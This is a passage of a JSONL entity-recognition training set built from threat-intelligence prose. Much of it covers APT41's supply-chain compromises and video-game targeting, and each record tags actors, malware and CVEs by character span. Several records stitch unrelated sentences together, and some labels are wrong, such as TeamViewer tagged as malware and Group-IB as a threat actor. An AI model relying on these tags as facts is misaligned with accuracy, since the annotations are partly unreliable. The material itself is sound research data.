the wild , but the new actors using Anubis have no support or updates . Machete is malware that has been developed and is actively maintained by a Spanish-speaking group . 
We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East .", "spans": {"MALWARE: Anubis": [[10, 16], [123, 129], [183, 189]], "THREAT_ACTOR: Machete": [[219, 226]], "THREAT_ACTOR: APT39": [[347, 352]]}, "info": {"id": "cyberner_stix_train_005706", "source": "cyberner_stix_train"}} {"text": "TG-3390 has access to proprietary tools , some of which are used exclusively by TG-3390 and others that are shared among a few Chinese threat groups .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7], [80, 87]]}, "info": {"id": "cyberner_stix_train_005707", "source": "cyberner_stix_train"}} {"text": "The iOS and Android apps for Netflix are enormously popular , effectively turning a mobile device into a television with which users can stream full movies and TV programs anytime , anywhere . Since the report’s release in September 2018 , Group-IB’s Threat Intelligence team has detected 16 campaigns targeting banks launched by Silence . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"SYSTEM: iOS": [[4, 7]], "SYSTEM: Android": [[12, 19]], "ORGANIZATION: Netflix": [[29, 36]], "ORGANIZATION: Group-IB’s": [[240, 250]], "ORGANIZATION: banks": [[312, 317]], "THREAT_ACTOR: Silence": [[330, 337]], "ORGANIZATION: consumer": [[417, 425]], "MALWARE: Carberp": [[517, 524]]}, "info": {"id": "cyberner_stix_train_005708", "source": "cyberner_stix_train"}} {"text": "Specifically , the following facts support this assessment: The attacker targeted the SIS suggesting an interest in causing a high-impact attack with physical consequences . 
This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": {"THREAT_ACTOR: attacker": [[64, 72]], "FILEPATH: IOC files": [[188, 197]], "THREAT_ACTOR: HIDDEN COBRA": [[206, 218]], "MALWARE: FALLCHILL": [[241, 250]]}, "info": {"id": "cyberner_stix_train_005709", "source": "cyberner_stix_train"}} {"text": "ESET researchers will continue monitoring new Turla activities and will publish relevant information on our blog . From the time of file creation , the attacker started working at least as early as July 2018 . The link to feeds.rapidfeeds.com left in its XML configuration file was also mentioned by Kaspersky’s report in the reference section , which confirms that the APT-C-09 group keeps updating its C2 configuration channel and the recent one reserves some past features . For example , Donot and Bitter disguised as Kashmiri Voice to attack Pakistan , Transparent Tribe attacked India with decoy document regarding terrorist attacks in Kashmir . Considering APT-C-09 , Bitter and Donot have carried out targeted attacks against China , we must take actions in advance and keep a close eye on their recent activities . APT41 espionage operations against the healthcare , high-tech , and telecommunications sectors include establishing and maintaining strategic access , and through mid-2015 , the theft of intellectual property . FireEye Threat Intelligence assesses with high confidence that APT41 carries out an array of financially motivated intrusions , particularly against the video game industry , including stealing source code and digital certificates , virtual currency manipulation , and attempting to deploy ransomware . APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . 
APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage operations in what appears to be activity that falls outside the scope of state-sponsored missions . Based on early observed activity , consistent behavior , and APT41's unusual focus on the video game industry , we believe the group's cyber crime activities are most likely motivated by personal financial gain or hobbyist interests . APT41 campaigns include most of the incidents previously attributed in FireEye Threat Intelligence reporting to GREF Team and a number of additional clusters that were previously unnamed . Activity traces back to 2012 when individual members of APT41 conducted primarily financially motivated operations focused on the video game industry before expanding into likely statesponsored activity . Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . APT41 has targeted organizations in 14 countries over seven years , including: France , India , Italy , Japan , Myanmar , the Netherlands , Singapore , South Korea , South Africa , Switzerland , Thailand , Turkey , the United Kingdom , and the United States (Figure 1) . APT41 espionage operations against entities in these countries follow targeting of verticals consistent with Chinese national policy priorities . We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but away from direct intellectual property theft . In 2014 , APT41 was observed carrying out espionage campaigns concurrently with financially motivated intrusions , demonstrating that they could balance different objectives simultaneously . Since 2017 , APT41's activities have included a series of supply chain compromises . 
The group also targeted companies involved in producing motherboards , processors , and server solutions for enterprises . Since 2013 , APT41 has targeted organizations involved in the research , development , and sale of computer components used for machine-learning , autonomous vehicles , medical imaging , and the consumer market . In a 2014 compromise , APT41 targeted a European conglomerate and specifically focused on systems physically located in China . In spring 2015 , APT41 targeted information related to two entities undergoing a merger announced the previous year . Since 2017 , APT41 has consistently targeted telecommunications companies , possibly a crucial first step to establish a foothold in targeting a particular region . Targeted telecom companies spanned several countries , and recently identified intrusions were concentrated in countries where we had not identified any prior APT41 activity . In July and August 2016 , APT41 sent spear-phishing emails to Hong Kong media organizations known for pro-democracy editorial content . This was the first instance we have observed of APT41 targeting pro-democracy groups in Hong Kong . APT41 frequently leverages timely news stories as the lure content in their spear-phishing emails , although social engineering content does not always correlate with targeted users or organizations . In 2015 , APT41 targeted a Japanese media organization with a lure document (Figure 3) titled 中東呼吸器症候 群(MERS)の予防 , ” which translates to Prevention of Middle East Respiratory Syndrome (MERS) . APT41 activity aimed at medical device companies and pharmaceuticals is demonstrative of the group's capacity to collect sensitive and highly valuable intellectual property (IP) , although we have not observed evidence of IP theft since late 2015 . 
Unlike other observed Chinese espionage operators , APT41 conducts explicit financially motivated activity , which has included the use of tools that are otherwise exclusively used in campaigns supporting state interests . Although APT41 initially targeted the parent company , 30 percent of the victimized hosts were related to a subsidiary specialized in manufacturing medical devices . In 2018 , we observed APT41 target a third healthcare company , although their goals during this compromise were unclear . In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . This provides another connection between the targeting of the cryptocurrency organizations and video game targeting . In October 2018 , the group compiled an instance of XMRig , a Monero cryptocurrency mining tool , demonstrating a continued interest in cryptocurrency . APT41 campaigns focused on the video game sector have largely affected studios and distributors in East and Southeast Asia , although global companies based in the United States have also been targeted . APT41 continuously returns to targeting the video game sector and seems to have matured its campaigns through lessons learned in operations against the industry . We believe these operations include broadly malicious activity that can enable further operations , such as targeting game source code and compromising digital certificates , while other activities are explicitly financially motivated , such as abusing in-game currency mechanics . In October 2012 , APT41 used captured credentials to compromise a jump server and access a production environment where they deployed a Linux version of PHOTO . 
Since at least 2012 , APT41 has repeatedly gained access to game development environments within affected companies , including online multiplayer networks , as well as targeting of production database administrators . APT41 has been observed inserting malicious code into legitimate video game files to distribute malware . In 2018 , the group inserted CRACKSHOT malware into game files that were signed with legitimate codesigning certificates , most likely indicating access to the production environment , which facilitated a supply chain compromise . We have also observed APT41 limitedly deploy rootkits on Linux systems and Master Boot Record (MBR) bootkits , such as ROCKBOOT , on Windows systems to hide their malware and maintain persistence on victim systems . Selective deployment of ROCKBOOT suggests that APT41 reserves more advanced TTPs and malware only for high-value targets . APT41 has blatantly engaged in financially motivated activity targeting the video game industry , including manipulating virtual currencies . In a highly unusual case , APT41 attempted to extort a game company by deploying the Encryptor RaaS ransomware . APT41 is well-known for leveraging compromised digital certificates from video game studios to sign malware . We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . APT41 has also used credentials compromised in previous operations . In 2014 , APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service . Although we do not have first-hand evidence of APT41's compromise of TeamViewer , we have observed APT41 use compromised TeamViewer credentials as an entry point at multiple organizations . 
Public reports of supply chain compromises linked to APT41 date back to at least 2014 , and technical evidence associated with these incidents was used to determine a relationship , if any , with APT41 . As demonstrated in operations targeting the video game industry , APT41 leverages a variety of TTPs to access production environments where they can inject malicious code into legitimate files . In March 2017 , suspected Chinese espionage operators targeted CCleaner , a utility that assists in the removal of unwanted files from a computer . In July 2017 , APT41 injected malicious code into a software update package maintained by Netsarang and signed it with a legitimate Netsarang certificate in an operation referred to as ShadowPad by Kaspersky . Both APT41 and the actors in the CCleaner incident used TeamViewer during initial compromise . Supply chain compromises are most likely an extension of APT41's tactics used in gaining access to gaming development environments and to other gaming organizations via third-party service providers . Beginning in July 2018 , APT41 appeared to have directly targeted several East and Southeast Asia-based video game developers and distributors to inject legitimate executables with the CRACKSHOT backdoor . The lure used to target the cryptocurrency exchange (displayed in Figure 5 and translated in Figure 6) referenced an online gaming platform , tying the cryptocurrency targeting to APT41's focus on video game-related targeting . FireEye malware analysis identified source code overlaps between malware used by APT41 in May 2016 targeting of a U.S.-based game development studio and the malware observed in supply chain compromises in 2017 and 2018 . In May 2016 , APT41 deployed a POISONPLUG sample at a U.S.-based game development studio . 
Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . Either APT41 is operating outside of state control but still working with other Chinese APT malware actors , tools , and infrastructure on a parttime or contractual basis , or APT41 is a full-time . APT41 uses many of the same tools and compromised digital certificates that have been leveraged by other Chinese espionage operators . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . APT41 has used several malware families that have also been used by other Chinese espionage operators , including variants of HIGHNOON , HOMEUNIX , PHOTO , SOGU , and ZXSHELL , among others . HIGHNOON , one of the main code families observed being used by APT41 , was also used by APT17 in 2015 to target semiconductor and chemical manufacturers . HOMEUNIX , another popular backdoor used by APT41 , has been used by at least 14 separate Chinese espionage groups , including APT1 , APT10 , APT17 , APT18 , and APT20 . APT41 has used CROSSWALK.BIN , a kernel driver , to circumvent firewalls and covertly send data . Another Chinese espionage group used a similar tool , CLASSFON , to covertly proxy network communications in 2011 . At least two of these malware families , HIGHNOON.CLI and GEARSHIFT , have been used by APT17 and another suspected Chinese espionage group . APT41 regularly leverages code-signing certificates to sign malware when targeting both gaming and nongaming organizations . In July 2017 , APT41 initiated a TeamViewer session and transferred files that were later deleted . 
In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . In May 2018 , APT41 used TeamViewer for initial entry in the compromise of a healthcare company . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Turla": [[46, 51]], "THREAT_ACTOR: attacker": [[152, 160]], "TOOL: XML": [[255, 258]], "ORGANIZATION: Kaspersky’s": [[300, 311]], "THREAT_ACTOR: APT-C-09": [[370, 378], [664, 672]], "TOOL: C2": [[404, 406]], "THREAT_ACTOR: Donot": [[492, 497], [686, 691]], "THREAT_ACTOR: Bitter": [[502, 508], [675, 681]], "THREAT_ACTOR: APT41": [[824, 829], [1098, 1103], [1338, 1343], [1516, 1521], [1974, 1979], [2219, 2224], [2430, 2435], [2598, 2603], [2869, 2874], [3072, 3077], [3216, 3221], [3618, 3623], [3841, 3846], [3963, 3968], [4077, 4082], [4388, 4393], [4431, 4436], [4589, 4594], [4641, 4646], [4852, 4857], [5035, 5040], [5336, 5341], [5516, 5521], [5695, 5700], [5811, 5816], [6315, 6320], [6519, 6524], [6982, 6987], [7147, 7152], [7344, 7349], [7703, 7708], [7944, 7949], [8020, 8025], [8189, 8194], [8275, 8280], [8401, 8406], [8609, 8614], [8688, 8693], [8930, 8935], [9074, 9079], [9217, 9222], [9291, 9296], [9583, 9588], [9783, 9788], [10099, 10104], [10589, 10594], [10743, 10748], [10861, 10866], [11029, 11034], [11198, 11203], [11221, 11226], [11601, 11606], [11857, 11862], [11993, 11998], [12119, 12124], [12475, 12480], [12615, 12620], [12721, 12726], [12846, 12851], [12892, 12897], [12986, 12991], [13097, 13102]], "ORGANIZATION: healthcare": [[863, 873], [12955, 12965]], "ORGANIZATION: high-tech": [[876, 885]], "ORGANIZATION: telecommunications sectors": [[892, 918]], "ORGANIZATION: FireEye": 
[[1035, 1042], [2045, 2052], [10508, 10515]], "ORGANIZATION: video game industry": [[1188, 1207], [1829, 1848], [8096, 8115]], "THREAT_ACTOR: APT41's": [[1800, 1807], [3410, 3417], [9930, 9937], [10460, 10467]], "ORGANIZATION: entities": [[2904, 2912]], "ORGANIZATION: producing motherboards": [[3528, 3550]], "ORGANIZATION: processors": [[3553, 3563]], "ORGANIZATION: server solutions": [[3570, 3586]], "ORGANIZATION: organizations": [[3637, 3650]], "ORGANIZATION: machine-learning": [[3733, 3749]], "ORGANIZATION: autonomous vehicles": [[3752, 3771]], "ORGANIZATION: medical imaging": [[3774, 3789]], "ORGANIZATION: consumer market": [[3800, 3815]], "ORGANIZATION: European conglomerate": [[3858, 3879]], "ORGANIZATION: telecommunications companies": [[4109, 4137]], "ORGANIZATION: telecom companies": [[4238, 4255]], "TOOL: emails": [[4457, 4463], [4732, 4738], [5837, 5843]], "ORGANIZATION: Hong Kong media": [[4467, 4482]], "ORGANIZATION: pro-democracy": [[4605, 4618]], "ORGANIZATION: Japanese media organization": [[4869, 4896]], "ORGANIZATION: medical device companies": [[5059, 5083]], "ORGANIZATION: financially": [[5360, 5371]], "ORGANIZATION: parent company": [[5545, 5559]], "ORGANIZATION: third healthcare": [[5710, 5726]], "ORGANIZATION: cryptocurrency organizations": [[6106, 6134]], "ORGANIZATION: video game targeting": [[6139, 6159]], "MALWARE: XMRig": [[6214, 6219]], "ORGANIZATION: video game sector": [[6346, 6363], [6563, 6580]], "ORGANIZATION: global companies": [[6449, 6465]], "MALWARE: game source code": [[6800, 6816]], "MALWARE: digital certificates": [[6834, 6854], [11271, 11291]], "SYSTEM: Linux": [[7100, 7105], [7738, 7743]], "ORGANIZATION: online multiplayer networks": [[7253, 7280]], "ORGANIZATION: administrators": [[7327, 7341]], "TOOL: Master Boot Record": [[7756, 7774]], "TOOL: (MBR)": [[7775, 7780]], "MALWARE: ROCKBOOT": [[7800, 7808]], "SYSTEM: Windows": [[7814, 7821]], "ORGANIZATION: ROCKBOOT": [[7921, 7929]], "TOOL: VPN": [[8746, 8749]], 
"ORGANIZATION: service provider": [[8779, 8795]], "ORGANIZATION: payment": [[8813, 8820]], "ORGANIZATION: service": [[8821, 8828]], "MALWARE: TeamViewer": [[8900, 8910], [9834, 9844], [12737, 12747], [12903, 12913]], "MALWARE: variety of TTPs": [[9309, 9324]], "THREAT_ACTOR: Chinese espionage operators": [[9446, 9473]], "ORGANIZATION: Kaspersky": [[9766, 9775]], "ORGANIZATION: video game developers": [[10178, 10199]], "ORGANIZATION: video game-related": [[10477, 10495]], "ORGANIZATION: game development": [[10633, 10649]], "FILEPATH: HIGHNOON": [[11378, 11386]], "THREAT_ACTOR: Winnti": [[11425, 11431]], "MALWARE: HIGHNOON": [[11727, 11735], [11793, 11801]], "MALWARE: HOMEUNIX": [[11738, 11746], [11949, 11957]], "MALWARE: PHOTO": [[11749, 11754]], "MALWARE: SOGU": [[11757, 11761]], "MALWARE: ZXSHELL": [[11768, 11775]], "THREAT_ACTOR: APT17": [[11882, 11887], [12091, 12096], [12421, 12426]], "ORGANIZATION: semiconductor": [[11906, 11919]], "ORGANIZATION: chemical manufacturers": [[11924, 11946]], "MALWARE: backdoor": [[11976, 11984]], "THREAT_ACTOR: groups": [[12057, 12063]], "THREAT_ACTOR: APT1": [[12076, 12080]], "THREAT_ACTOR: APT10": [[12083, 12088]], "THREAT_ACTOR: APT18": [[12099, 12104]], "THREAT_ACTOR: APT20": [[12111, 12116]], "MALWARE: CROSSWALK.BIN": [[12134, 12147]], "MALWARE: CLASSFON": [[12271, 12279]], "MALWARE: HIGHNOON.CLI": [[12374, 12386]], "MALWARE: GEARSHIFT": [[12391, 12400]], "MALWARE: code-signing certificates": [[12501, 12526]], "ORGANIZATION: nongaming organizations": [[12574, 12597]], "ORGANIZATION: company": [[12966, 12973]], "VULNERABILITY: exploit": [[13028, 13035]], "VULNERABILITY: CVE-2019-3396": [[13045, 13058]], "ORGANIZATION: payment services": [[13116, 13132]]}, "info": {"id": "cyberner_stix_train_005710", "source": "cyberner_stix_train"}} {"text": "If the C2 has already been taken offline the document will still open , but Word will be unable to retrieve the remote template and thus Word will not load a macro .", "spans": {"TOOL: 
C2": [[7, 9]], "TOOL: Word": [[76, 80], [137, 141]], "TOOL: macro": [[158, 163]]}, "info": {"id": "cyberner_stix_train_005711", "source": "cyberner_stix_train"}} {"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Fresh from targeting banks in Poland , the banking Trojan GozNym has begun taking aim at banks in Germany .", "spans": {"ORGANIZATION: South Korean government": [[71, 94]], "ORGANIZATION: military": [[97, 105]], "ORGANIZATION: defense": [[112, 119]], "ORGANIZATION: banks": [[159, 164], [227, 232]], "ORGANIZATION: banking": [[181, 188]], "MALWARE: Trojan": [[189, 195]], "MALWARE: GozNym": [[196, 202]]}, "info": {"id": "cyberner_stix_train_005712", "source": "cyberner_stix_train"}} {"text": "We continue to monitor its progress . ] com , which we previously identified in October 2017 to be an OilRig C2 . It can be proc.exe or chrome.exe or winrar.exe . External Server Requests Indicates an attempt to exfiltrate data to an external server .", "spans": {"THREAT_ACTOR: OilRig": [[102, 108]], "FILEPATH: proc.exe": [[124, 132]], "FILEPATH: chrome.exe": [[136, 146]], "FILEPATH: winrar.exe": [[150, 160]]}, "info": {"id": "cyberner_stix_train_005713", "source": "cyberner_stix_train"}} {"text": "For contacting C & C , the spyware was found to be using free DNS services , as shown in the screenshot below : SpyNote RAT uses an unusual trick to make sure that it remains up and running and that the spying does not stop . Prior to April 2018 , as described in Group-IB’s Silence: Moving into the darkside report , Silence’s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . 
Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens .", "spans": {"MALWARE: SpyNote RAT": [[112, 123]], "THREAT_ACTOR: Group-IB’s": [[264, 274]], "THREAT_ACTOR: Silence’s": [[318, 327]], "THREAT_ACTOR: threat groups": [[706, 719]], "THREAT_ACTOR: OilRig": [[730, 736]], "THREAT_ACTOR: CopyKittens": [[741, 752]]}, "info": {"id": "cyberner_stix_train_005714", "source": "cyberner_stix_train"}} {"text": "In April 2013 , we saw the first sample , which made heavy use of dynamic code loading ( i.e. , fetching executable code from remote sources after the initial app is installed ) . MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs . IRONHALO persists by copying itself to the current user ’s Startup folder . We recommend checking the following for potential evidence of compromise : • Child processes of on Exchange Servers , particularly .", "spans": {"THREAT_ACTOR: MUSTANG PANDA": [[180, 193]], "TOOL: PowerShell scripts": [[264, 282]], "TOOL: Microsoft Office documents": [[287, 313]], "MALWARE: IRONHALO": [[361, 369]], "TOOL: Startup": [[420, 427]]}, "info": {"id": "cyberner_stix_train_005715", "source": "cyberner_stix_train"}} {"text": "The Trojan also hit users from Ukraine , Turkey , Germany , Belarus , Poland , Armenia , Kazakhstan , the US , and other countries . In 2015 , the SecureWorks® Counter Threat Unit™ ( CTU ) research team documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU™ analysis suggests is based in the People's Republic of China ( PRC ) . Outlaw ’s attack routines may not be new , but it still serves as a reminder for enterprises to update their systems regularly . 
Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month , while PLAY focused on Switzerland ( 5 ) .", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit™": [[147, 180]], "ORGANIZATION: CTU": [[183, 186]], "THREAT_ACTOR: TG-3390": [[263, 270]], "ORGANIZATION: CTU™": [[281, 285]], "THREAT_ACTOR: Outlaw": [[357, 363]], "THREAT_ACTOR: 8BASE": [[533, 538]], "ORGANIZATION: Brazil": [[567, 573]], "THREAT_ACTOR: PLAY": [[609, 613]], "ORGANIZATION: Switzerland": [[625, 636]]}, "info": {"id": "cyberner_stix_train_005716", "source": "cyberner_stix_train"}} {"text": "Below are a series of indicators Microsoft has observed as active during the STRONTIUM activity discussed in this article .", "spans": {"THREAT_ACTOR: STRONTIUM": [[77, 86]]}, "info": {"id": "cyberner_stix_train_005717", "source": "cyberner_stix_train"}} {"text": "ABUSE OF ACCESSIBILITY SERVICES EventBot abuses the accessibility services of Android devices for the majority of its activity . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer .", "spans": {"MALWARE: EventBot": [[32, 40]], "SYSTEM: Android": [[78, 85]], "MALWARE: OutExtra.exe": [[129, 141]], "MALWARE: finder.exe": [[198, 208]], "MALWARE: DropIt sample": [[239, 252]], "FILEPATH: cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671": [[264, 328]], "FILEPATH: %TEMP%\\flash_update.exe": [[390, 413]], "MALWARE: Flash Player installer": [[438, 460]]}, "info": {"id": "cyberner_stix_train_005718", "source": "cyberner_stix_train"}} {"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . 
Considering the Trojan delivery method and through our analysis of infections on banks' networks , we can confirm that all infections were conducted on a random basis .", "spans": {"MALWARE: flare-qdb": [[18, 27]], "MALWARE: Trojan": [[102, 108]]}, "info": {"id": "cyberner_stix_train_005719", "source": "cyberner_stix_train"}} {"text": "The document attached to this e-mail exploits CVE-2012-0158 . However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused .", "spans": {"VULNERABILITY: e-mail exploits": [[30, 45]], "VULNERABILITY: CVE-2012-0158": [[46, 59]]}, "info": {"id": "cyberner_stix_train_005720", "source": "cyberner_stix_train"}} {"text": "This was the C2 for an Android infostealer responsible for several attacks in Italy back in late 2019 . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . 
They move laterally and escalate system privileges to extract sensitive information — whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult .", "spans": {"MALWARE: Android infostealer": [[23, 42]], "MALWARE: China Chopper": [[108, 121]], "VULNERABILITY: CVE-2015-0062": [[250, 263]], "VULNERABILITY: CVE-2015-1701": [[266, 279]], "VULNERABILITY: CVE-2016-0099": [[284, 297]], "THREAT_ACTOR: attacker": [[311, 319], [459, 467]], "MALWARE: RATs": [[501, 505]]}, "info": {"id": "cyberner_stix_train_005721", "source": "cyberner_stix_train"}} {"text": "The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes .", "spans": {}, "info": {"id": "cyberner_stix_train_005722", "source": "cyberner_stix_train"}} {"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China .", "spans": {"MALWARE: RTF attachments": [[44, 59]], "VULNERABILITY: CVE-2017-0199": [[124, 137]], "ORGANIZATION: Pakistani businessmen": [[257, 278]]}, "info": {"id": "cyberner_stix_train_005723", "source": "cyberner_stix_train"}} {"text": "Previous version The capture service class implements the chat applications interception . Callisto Group and related infrastructure contain links to at least Russia , Ukraine , and China . The one outlier was written as winword.exe . 
Acquire Infrastructure : Web Services APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware , such as HAMMERTOSS .", "spans": {"FILEPATH: winword.exe": [[221, 232]], "THREAT_ACTOR: Web Services APT29": [[260, 278]], "SYSTEM: C2": [[354, 356]], "MALWARE: malware": [[360, 367]], "MALWARE: HAMMERTOSS": [[378, 388]]}, "info": {"id": "cyberner_stix_train_005724", "source": "cyberner_stix_train"}} {"text": "Example of more recent FakeSpy campaigns targeting France . Symantec’s Elfin report denoted additional targeting of the engineering , chemical , research , finance , IT , and healthcare sectors . Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute .", "spans": {"MALWARE: FakeSpy": [[23, 30]], "ORGANIZATION: Symantec’s": [[60, 70]], "THREAT_ACTOR: Elfin": [[71, 76]], "ORGANIZATION: engineering": [[120, 131]], "ORGANIZATION: chemical": [[134, 142]], "ORGANIZATION: healthcare": [[175, 185]], "THREAT_ACTOR: GCMAN group": [[243, 254]], "ORGANIZATION: bank": [[287, 291]]}, "info": {"id": "cyberner_stix_train_005725", "source": "cyberner_stix_train"}} {"text": "In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . 
Upon successful exploitation , the attachment will install the Trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": {"THREAT_ACTOR: attackers": [[29, 38]], "FILEPATH: attachment": [[203, 213]], "MALWARE: Trojan": [[231, 237]], "MALWARE: NetTraveler": [[247, 258]], "FILEPATH: DLL side-loading": [[267, 283]]}, "info": {"id": "cyberner_stix_train_005726", "source": "cyberner_stix_train"}} {"text": "Translated from Russian , this file is named “ PROJECT_REALIZATION_PLAN.rar ” and contains a compressed .scr executable .", "spans": {"FILEPATH: PROJECT_REALIZATION_PLAN.rar": [[47, 75]], "FILEPATH: .scr": [[104, 108]]}, "info": {"id": "cyberner_stix_train_005727", "source": "cyberner_stix_train"}} {"text": "Zen family PHA authors exhibit a wide range of techniques , from simply inserting an advertising SDK to a sophisticated trojan . he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . Dell SecureWorks Counter Threat Unit ( CTU ) analysts were recently engaged with a client thought to have been compromised by a threat group CTU researchers have named Threat Group-0416 ( TG-0416 ) . 
The code of the exploit is very similar to the one published in the Metasploit kit , but the inner class that disables the security manager is encoded differently , most likely to avoid detection .", "spans": {"MALWARE: Zen": [[0, 3]], "THREAT_ACTOR: PassCV": [[132, 138]], "TOOL: publicly available RATs": [[164, 187]], "ORGANIZATION: Dell SecureWorks Counter Threat Unit": [[340, 376]], "ORGANIZATION: CTU": [[379, 382], [481, 484]], "THREAT_ACTOR: Threat Group-0416": [[508, 525]], "THREAT_ACTOR: TG-0416": [[528, 535]]}, "info": {"id": "cyberner_stix_train_005728", "source": "cyberner_stix_train"}} {"text": "In the summer of 2014 , we noted that certain samples of BlackEnergy malware began targeting Ukranian government organizations for information harvesting . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": {"TOOL: BlackEnergy malware": [[57, 76]], "ORGANIZATION: government organizations": [[102, 126]], "THREAT_ACTOR: APT32": [[166, 171]], "FILEPATH: Vietnam.exe": [[270, 281]], "ORGANIZATION: diaspora": [[341, 349]]}, "info": {"id": "cyberner_stix_train_005729", "source": "cyberner_stix_train"}} {"text": "Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . The mothership server is generally a VPS , which runs the Control panel software used to interact with the victims .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "TOOL: Carberp": [[51, 58]], "THREAT_ACTOR: espionage": [[76, 85]], "TOOL: VPS": [[195, 198]]}, "info": {"id": "cyberner_stix_train_005730", "source": "cyberner_stix_train"}} {"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . 
Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": {"MALWARE: RIPPER": [[0, 6]], "ORGANIZATION: ATM vendors": [[77, 88]], "ORGANIZATION: Deepen": [[143, 149]], "ORGANIZATION: China and US relations experts": [[238, 268]], "ORGANIZATION: Defense Department": [[271, 289]], "ORGANIZATION: geospatial groups": [[305, 322]], "ORGANIZATION: federal government": [[334, 352]]}, "info": {"id": "cyberner_stix_train_005731", "source": "cyberner_stix_train"}} {"text": "The threat actor relied on WMI and PsExec to move laterally and install their tools across multiple assets . Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16]], "TOOL: WMI": [[27, 30]], "TOOL: PsExec": [[35, 41]], "ORGANIZATION: military personnel": [[195, 213]], "ORGANIZATION: businessmen": [[218, 229]]}, "info": {"id": "cyberner_stix_train_005732", "source": "cyberner_stix_train"}} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . 
BARIUM , a Chinese state player that also goes by APT17 , Axiom and Deputy Dog , was previously linked to the ShadowPad and CCleaner incidents , which were also supply-chain attacks that used software updates to sneak onto machines .", "spans": {"MALWARE: Mimikatz": [[0, 8]], "THREAT_ACTOR: BARIUM": [[105, 111]], "THREAT_ACTOR: APT17": [[155, 160]], "THREAT_ACTOR: Axiom": [[163, 168]], "THREAT_ACTOR: Deputy": [[173, 179]], "THREAT_ACTOR: Dog": [[180, 183]], "MALWARE: ShadowPad": [[215, 224]], "MALWARE: CCleaner": [[229, 237]], "MALWARE: software updates": [[297, 313]]}, "info": {"id": "cyberner_stix_train_005733", "source": "cyberner_stix_train"}} {"text": "SHA256 15abd32342e87455b73f1e2ecf9ab10331600eb4eae54e1dfc25ba2f9d8c2e8a .", "spans": {"FILEPATH: 15abd32342e87455b73f1e2ecf9ab10331600eb4eae54e1dfc25ba2f9d8c2e8a": [[7, 71]]}, "info": {"id": "cyberner_stix_train_005734", "source": "cyberner_stix_train"}} {"text": "The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . However , despite the similarities to previous Turla campaigns , we believe that WhiteBear is a distinct project with a separate focus .", "spans": {"THREAT_ACTOR: 